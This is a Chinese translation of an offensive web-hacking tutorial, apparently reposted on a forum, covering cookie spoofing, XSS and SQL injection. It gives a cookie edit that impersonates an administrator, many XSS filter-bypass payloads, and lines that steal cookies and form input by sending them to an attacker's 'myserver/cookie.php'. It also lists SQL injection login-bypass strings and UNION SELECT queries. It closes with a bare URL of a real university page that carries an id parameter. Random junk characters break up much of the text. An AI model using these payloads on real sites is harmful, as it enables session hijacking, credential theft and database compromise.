XSS & SQL注入

admin

XSS & SQL注入
文章作者：CyberPhreak
4 L: k. _( d" U/ B译文作者：黯魂 [S.S.T]
2 I; N$ o& ^4 n9 U, a
* q. E8 q, U) n- F4 l" \, H
2 r  |" H! h( {, t0 K. \XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
- ?9 o, ?9 x- f! a5 j  qX Web Security - XSS & more X
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
9 P5 y- F, F6 \7 Q8 G6 Z$ {, F
2 a4 @) M- O0 ]7 M
& i& P$ g  \# i  }% Q1 y~介绍

! \. X  @( a0 D在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力,因为大多数人都修补了简单的XSS漏洞.但是他们所忘记做的是修补比XSS的一个字符串更多的漏洞,并且php中特殊安全机制被用来防御XSS,而取代他们自己的方法.同时我将阐述的不仅仅是XSS,而是所有的web安全.

, c+ D1 @& S$ M3 D6 z; vXXXXXXXXXXXXXXXXXXXXX
* K. ]  O/ }/ O. NX Table OF Contents X
XXXXXXXXXXXXXXXXXXXXX
" O; _* F& @7 ?2 z# ]5 |. |% h" o
3 s5 J  n0 C  @$ [. s) cXXXXXXXXXXXXXXXXXXXX
. c) g9 e5 H$ NX Cookie Editing X
; r! V0 a4 o7 x: yX XSS X
" ~7 z5 m* s$ k& y5 @" HX SQL Injection X
XXXXXXXXXXXXXXXXXXXX
+ h" K6 s% `& p% }, @4 ]
~什么是cookie

cookie就是一块数据.一旦你浏览一个站点并且注册一个帐号,一个cookie就被设置以记录你的信息.cookie仅仅保存你登录的信息以使站点检测以前你是否登录过,如果不是,它就会检测你的用户名和密码的正确性,然后登录.比如说在一个夜总会,你买了一张票,他们就会给你一张卡.因此你可以进进出出而不用每次都买票.而cookies比你所能看到的要复杂得多.夜总会只能记住你一晚上,但是cookies却能记住你一辈子.
0 _9 l; W7 I8 y! Y: L' r
~警告&欺骗
6 H7 j+ v. k! m$ q! |$ X2 o. ]4 `
那么现在你知道了cookie是什么...你如何看待它们?事实上,cookie编辑(修改)是最简单的方法之一.只要有一个浏览器,你就能够查看和编辑cookies,并且只需要一些基础的javascript知识.打开你的浏览器然后随便去一个网站吧,登录...现在输入javascript:alert(document.cookie).这时你应该可以看见一个用户名和密码.然而大多数站点现在都不使用cookies,而使用sessions.很遗憾,sessions不能被修改(服务端可以),不像cookies,一旦你修改了一个cookie你就可以欺骗你自己.现在让我们开始欺骗...假设你看到了一个警告框并且看到一些像这样的内容:
/ S: G$ s+ C4 z' h/ \+ B! ~
% p" P5 |# k- G0 `strusername=cnsst;strpassword=cnsst
: x; R! S4 K  Q5 d. i$ a/ Q
: {& {8 o- |5 u. k1 u  d: u此时假设你知道'bitch'是一个管理员,可是你不知道密码. 由于脆弱的安全机制你不需要密码:javascript:void(document.cookie="strusername=bitch")
7 |% W- y% ^% Y/ X: Z! r7 `. i现在输入:javascript:alert(document.cookie).那几乎非常接近cookie修改了...
4 _& `2 H) i& }9 y; `% w# O* A0 T! c
~什么是XSS

XSS,或者CSS,不管你更喜欢怎样称呼它,XSS(CSS)都代表着跨站脚本.基本上意思就是你能以任何方式注入脚本,来让它完成你想要做的.通过XSS你也可以截获输入信息,像用户名,密码以及cookies.这都将被讨论,所以接下来将会有很多例子,我们这篇文章应该能够帮你在XSS上发挥自己的创造力.

/ t5 f7 Q0 s+ I1 T. G~为什么使用XSS
) a8 H1 N- M! X- Z) \: _- f0 ~, H
很明显的问题,通过XSS你能在客户端和服务器端执行任何类型的脚本.然而XSS却不仅仅局限于执行脚本上,还能截获输入.输入类似:<input name="name" type="name">
你通过XSS截获输入,然后通过一个秘密文件把截获到的信息发送向你的站点.而这一切绝不是XSS所能实现的全部作用.XSS还能截获cookies.Cookies保存着有价值的信息,像用户名,密码等等.
& _, S7 q; ]; v9 V; c2 c
2 F  C+ ?0 Y, S5 U8 G  d$ Q~让我们开始吧…
# b: N6 U/ c% G3 U* @
我假定你知道html和javascript,而php知识也有帮助,但却不是必要的.让我们从这个php脚本开始.
& o! A# z0 R* k# F, B
+ O5 a) Y0 G8 c. f& ~! ^XSS--跨站脚本&lt;html&gt;
! K1 d, S& r* E5 d! I4 j6 a
&lt;body&gt;
8 A. G$ V3 F: O& O* V* X9 T. C+ M
&lt;form action="" method="GET"&gt;

% ^. n  _" w% f+ P2 s# q2 {0 X. w" l&lt;!-- 我使用的GET方法,因为当我们利用的时候更容易练习. --&gt;
( q& M% O0 @  R1 C2 e
Script: &lt;input name="name" type="name"&gt;
* Z5 w( C6 a/ ?! I( u8 C+ J
# }& z  F5 ^% Q# O5 y7 [- s&lt;input type="submit" value="submit"&gt;

' S4 _0 x/ ]2 U, ]&lt;/form&gt;
0 {' w; I3 `2 H9 K/ R+ G
0 R; J9 Z% X  F; i  n2 Z, T/ d&lt;/body&gt;
2 N9 g& k& |" ~" G1 s
&lt;/html&gt;

% ^9 Z9 |- N+ O: Y3 h

&lt;?php
) Q& I9 F' ]- r+ Z
* ]( d* E3 b1 g5 J$name = $_GET['name'];

echo("Hello $name");

" |/ r3 q& m$ L' d4 s?&gt;
复制代码OK,我们应该都知道上面的代码有什么用...这是一个非常奇怪的脚本,没有一个人会在自己的站点上使用它(至少我没见过),但是它对初学者理解原理却真的很有用.来看看我输入后所得到的信息:
1 W& W0 A  L9 o: n' Z" e
( F6 J" F+ P% H- G! gcnsst
/ k* a, z/ I+ E$ m; I# [8 V& ?"Hello cnsst!"

引号内的信息就是输出信息..注意看,现在我输入:
<script>alert(document.cookie)</script>
  f2 q% @" ?1 W' z2 I5 R% ?
, K; z, m0 m, t* p5 A& L那么它将会弹出document.cookie!所以它是易受XSS攻击的!

, _) ^7 J/ S' X( B现在我们已经对XSS有了一点了解,那让我们理解它.首先,脚本做的是取得你的输入然后粘贴它.嗯...也就是说我们能输入任何数据.所以?等等...任何数据...好的,你想问客户端和服务器端分别有什么语言? 让我告诉你,基本上客户端语言是建立在你客户端浏览器之上的:JavaScript,html, VBScript等等...

' Q% M; S1 L+ R9 ^6 k服务器端语言在另一边,不是建立在你客户端之上的,而建立在服务器之上,有php,asp等等...
* i7 R( b% {1 L, u: c+ M/ N/ s
3 @+ m( o2 {& [  G: E# p3 Z7 j已有一些方法注入php,稍后我将说明.现在先想想这怎样才能对我们有帮助?注入javascript?简单.比如说你正在编写一个网站程序,由于是你的站点,所以你能使用所有你想使用的javascript(JS).因此其他任何人也可以,因为XSS允许你让网站运行你想要运行的任何脚本.
9 o$ ?. x( O$ [3 V, g
0 S# U4 k1 y/ D1 Y! o2 g让我们看一个稍微复杂点的例子!
% w4 u: t* ~3 w8 J5 x
假设你已经输入了<script>alert(document.cookie)</script>,并且回显是这样的:
scriptalert(document.cookie)/script
或者可能是这样的:
0 Y7 B1 T6 {' F9 c  d9 E+ Iscriptalertdocument.cookie/script
& ?1 p6 ~- A% X) G
" |. [5 W6 R9 g8 v3 ]1 B+ @可以看出更难利用了...不过有很多方法使用XSS,这只是其中一种.而且是其中最烂的方法之一.你看到当中的"<>"都被空字符" "替换了.
" X, u: g6 P7 j) D. @- W4 D1 ~9 H
让我们继续利用:
* D% Q) C' i5 O/ A4 W<<script>>alert(document.cookie)<</script>>
; r* o, N& v' ?
5 L% m- D* l$ k8 ~( |2 w你的输出将弹出document.cookie.

' ?) O6 V; g% f% H" h现在来看看更狠的:
& x! D0 Q1 S0 R+ E# N<<script>>alert((document.cookie))<<//script>>
5 W1 _' @9 M, D9 A7 p
; U. t) O9 C. L% u+ Z
他们可能会替换所有的,或者只是"<>".所以如果一对不能得以执行,另一对就可以.现在,如果你看到:
scriptalertdocument.cookie/script
; l9 I- p! y+ `9 D' g或者 <<<script>>>alert(document.cookie)<<</script>>>  

他们可能替换2对来欺骗你,或者替换一些字母.试着用你自己的方法来利用...你输入:
; E) o2 [& q) h( M<script>alert(document.cookie)</script>
& @, ?9 N$ p; P2 c8 T
输出像这样:srplert(document.cookie)srp
: m" ?4 U; U! H+ \- t$ c
9 }9 F4 r# V1 x$ ^8 W. J仔细观察,你就会发现document.cookie中并没有什么被替换.为什么呢? 因为他们并不清楚你想要alert什么,以及你想做什么.所以他们只是猜测,就只阻止了"<>"以及script部分.怎么绕过?看看这个:
3 L0 r2 ^4 @( @& o<<sccriiptt>>aalert(document.cookie)<<//sccriiptt>>

1 y% u! ]* Y$ I% j4 W; K8 W所有重复多余的部分刚好被替换!现在让我们来点更高级的!

这次他们使用的仍然是替换,但是却检查了整个字符串!例如:
<script>alert(document.cookie)</script>

输出将是:
scriptalert(document.cookie)script
& T, V8 [- s& M  v) P% \8 A
6 ]$ W( R- q; [# ]! }" J% b  w看到这,你激动地说,"我知道该怎么做了!" OK,让我们按照你的方法来重新构造:
<<script>>alert(document.cookie)<</script>>

输出:scriptalert(document.cookie)script. 这时你可能会继续增加更多的<>.可是,他们替换了任何"<>",无论你输入多少个...看到我说"任何"了吗?使用下面这个例子:
1 _* o6 w2 T) B7 H+ o: a+ U
) I- I+ Z0 a2 ~% _# Y<
$ J7 ]2 K( C2 z! z1 v$ oscript
>
& h0 y. N9 @2 }, I1 ^5 e8 @# Yalert
, x5 Z6 B) y% d2 ^; u: |2 [9 w% E(
2 ^$ b9 j! I! O  ?0 zdocument
" P* u: M) h  `% z$ Z9 c.
: I; k& I6 |& @8 D' b0 B  |6 m; tcookie
)
<
$ i" }, ]+ M  `- u2 C4 J5 _/
/ @. n7 s( j6 ^# d: ^2 X: Hscript
- l' N1 E0 @" x5 W1 v>

" I' \# p* i: P) P  ~2 ]$ v/ p4 q
看看它,它没有替换"<>",它替换代码关键字.所以即便你写的是一句没有"<>"的代码,将仍然被替换,这就是我们为什么这样写的原因.假如对方使用更严格的标准,替换任何类型的代码,甚至是"alert"! 我们又该怎么改进呢?看看这个:
<
! @" d& w& \; ^3 |1 A4 ~s
: D5 G* F% c9 C$ K$ R5 kc
' p* D; I: R! h1 I0 C) ?r
i
p
t
7 i; p( |$ R1 x2 m>
a
7 L1 F$ c2 v) O4 |l
e
r
t
(
d
o
c
" G% [, L$ J7 K0 ~0 uu
, b: B6 t) A) a1 Vm
& Z# q8 f* X9 m# o) q( }0 _e
n
. W; ^; e- C2 q, u/ V5 A. st
# L9 t* A! |* U; }9 }.
c
o
o
k
6 ^" r& a) y. a, E9 i4 x4 Ti
. U2 A& I+ h0 `7 |0 o! ~2 @e
  I1 K' J- [. g: l)
7 U1 g7 m$ J% {: X& w: ~<
. g% j' ^0 R4 W* s- `+ E' V/
8 t. u* [8 D* k( o/ e7 S. Ks
% i( U7 ]8 U  O' B! fc
r
i
3 v0 e" p' v- r) J1 L5 k/ rp
; p: _4 k: t2 qt
/
; O* k% B' ]! i>
2 o, M' Q' b! _
这下应该可以了,但是如果他们仍然替换"<",你可以增加2对"<< >>"(并且你可以用任何字符取代document.cookie)
  Z/ [2 B9 K6 U4 a; y. u
还有更多我可以演示的替换,但是我教你的只是想让你发挥自己的创造力.
5 G: c- X. V! q" \% q
9 t/ s8 @% Q* `现在让我来讲讲其他XSS方法.前面我们已经讨论了客户端XSS,那么现在就来看看服务器端XSS.

首先让我说明它们之间的区别.客户端是从你浏览器经解释语言,如JavaScript (JS) VBScript (VBS)等而看到的.服务器端XSS是通过来自服务器端的语言,如php,asp等的XSS.客户端通过浏览器查看,服务器端通过服务器查看.

我们已经学会了怎样构造客户端XSS,而构造服务器端我们必须注入脚本到服务器上.要完成这个,我们需要找到一个像任何XSS的脚本,但是这个脚本能够保存你的XSS到服务器中.现在,假设你在一个网站上发表了一篇文章,现在要做的是取代文章,用XSS,为什么我们应该用JavaScript?为什么不用php?但是先让我给你看点东西.
document.forms(0).action ="http://myserver/myscript.php
' j. p) v' k9 ]% i1 g这既能在服务器端也能在客户端,没有关系.因此你的脚本将复制他们所输入的信息到那个表单中,并保存在我们站点上的一个*.txt文件中.
! \6 w; S  Q, ^- @  y; P  N- i
再次假设你在网站上注册了一个帐号,并且可以自定义资料...
6 {0 e- ]% N2 sdocument.images(0).src="http://myserver/cookie.php"+document.cookie.
7 G9 B: \) Y9 L1 S* x3 _或者如果你有空间可以存放指向自定义内容的链接,你可以输入:
: t) c( }- ~+ v5 G* o# G5 ijavascript:location.href="http://myserver/cookie.php"+document.cookie
这将截获访问我们资料的用户的cookie.这可以用于任何地方而不仅仅在资料上,它只是一个例子.

有时一个站点会回显你的UserAgent和Referer...现在让我们在DOS提示符下或者命令行窗口中试一试一些XSS,
; m/ [% u4 F! J! B$ B" m  mtelnet example.com
GET /page/toplacewhere_itechos_your_useragent.php HTTP/1.1
User-Agent: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
. G, w/ ]: @5 o; J; U5 o) ]Referer: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
~什么是SQL注入

+ \5 z; @0 o# e/ N, A4 c# d! }- oSQL注入,网站中最大的安全问题之一.那么到底什么是SQL注入?其实也就是注入SQL.现在让我们来挖掘不同级别的SQL漏洞.假设你有一个像这样的登录页面:&lt;html&gt;
: i$ x# q2 G/ f% g# |* ^$ a) u
&lt;body&gt;
6 \  q' H' }' f* G& |7 P, e
3 ^2 \$ u* b* k# v3 d9 z&lt;form action="" method="POST"&gt;

Username: &lt;input name="name" type="name"&gt;

Password: &lt;input name="password" type="password"&gt;
% I& Y, ?, g+ `
&lt;input type="submit" type="submit" value="Submit"&gt;
, d0 @0 R6 \3 O1 B" N6 P
2 ^: U/ y; f6 x0 N&lt;/form&gt;

: n5 K) L: K7 {* {/ _6 t* t( w+ Y9 l&lt;/body&gt;

4 E1 X' D  ^$ V. s/ P&lt;/html&gt;
8 H0 \: ^4 A! S! ~( B8 g+ H% X复制代码这里面有一个XSS漏洞,但是不用担心它,没有办法猜出或者破解出密码.所以,我们该怎么办?SQL注入!

最简单的攻击是在用户名和密码那里输入"'".如果没有保护机制,此时你应该得到一个错误信息.如果你得到了,它就是极易受攻击的.可是错误信息毫无价值,除非你知道如何利用它.所以,我会给你一个你可以使用的注入列表,以便在你得到一个单引号的错误信息时使用.

0 U* v' ?9 d# B'='
'OR 1=1--
'OR a=a--
'OR'

自从人们增强安全性以后,现在这些注入就很难发挥作用了,但是下面这个列表却是很多人在安全列表里没有注意到的:

3 J5 v2 P' H6 A2 T( I4 C1 B'OR''='
6 p! _2 _( y* ?# d4 _, c. ?4 X. o'OR"="
( l' y% K. |- i% j3 ?'OR'="
'OR '="
'OR "='
8 S9 D: x: m5 j0 ['OR ''='
'OR '=''
'OR "=''
% k: B' {7 d( D" \# j'OR ''="
& L; ^3 B; Y" ?5 H

~
5 n+ W0 U+ w  U2 Q% Y+ f- L5 Y现在让我说明UNION ALL SELECT声明,这将选出数据库中的一个表...所显示的内容取决于你所选择的列.
6 b0 Z( I5 p6 GUNION ALL SELECT username,password FROM users
+ X6 o: [5 F, _! @
- o* F! L2 C$ B% b2 e+ R- D这个查询语句将执行,但是….如果毫无作用呢?
; h+ d: N; S% DUNION ALL SELECT username,password FROM users WHERE username='OR "='
$ i  [8 z% h- K: A( A; V! b9 ^AND password='OR "='
& g: p7 j# c' j* ~* k6 k
你可能使用其他字符来替代'OR "='以注入存在的注入点.可是首先考虑一下,你是怎么知道表名的?实际上,你发现了一个SQL漏洞,它给了你错误信息,而错误信息包含了表名.

一旦你发现了漏洞,你就会按照习惯去用类似'OR "='的方法去进行注入,以得到表名.有时候你想从表中查询一些有用的数据,你却不得不选择所有的表,因为你并不知道所要查询的数据在哪个表里.下面的例子中存在20个不同表名的表,你试图查询一个ip的列表:
; `2 k  u' x1 BUNION ALL SELECT
ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip FROM logs
5 A5 k6 z9 ?! S9 {3 s" {: VWHERE ip='OR''="

1 @# O8 W) j+ H& j5 I  G" B现在你看到这个了吗?(我确信你已经看到了)
http://example.com/index.php?article=34
那将浏览Id为34的文章...让我们用"'"替换34:
http://example.com/index.php?article='
- A% {: e! O, h( m; n, [* y0 j
% m" K0 @; a  e9 P7 p
现在,记住我所说的,大多数人都没有意识到'所带来的不安全性,你总是能够尝试不同的注入方法,这里是一些例子:
$ p( k# k, l& y: f- w6 {, T: |http://example.com/index.php?article='
' B" j6 g9 H4 Z# c) y' ahttp://example.com/index.php?article='='
* Y. \3 R0 C! [http://example.com/index.php?article='OR 1=1--
http://example.com/index.php?article='OR a=a--
http://example.com/index.php?article='OR '="
http://example.com/index.php?article='OR "='
http://example.com/index.php?article='OR ''='
http://example.com/index.php?article='OR '=''
- l( S% r; z" G( d4 bhttp://example.com/index.php?article='OR''='
3 U5 @( a/ C' l0 P" mhttp://example.com/index.php?article='OR"'='
http://example.com/index.php?article='OR"''='
! U- c$ f; \% [4 h- B. `; }* h
1 e. I# k9 e) D7 \( \! ]* `$ }1 a尽情发挥自己的创造力!
http://www.ie.tsinghua.edu.cn/notice/show.php?id=704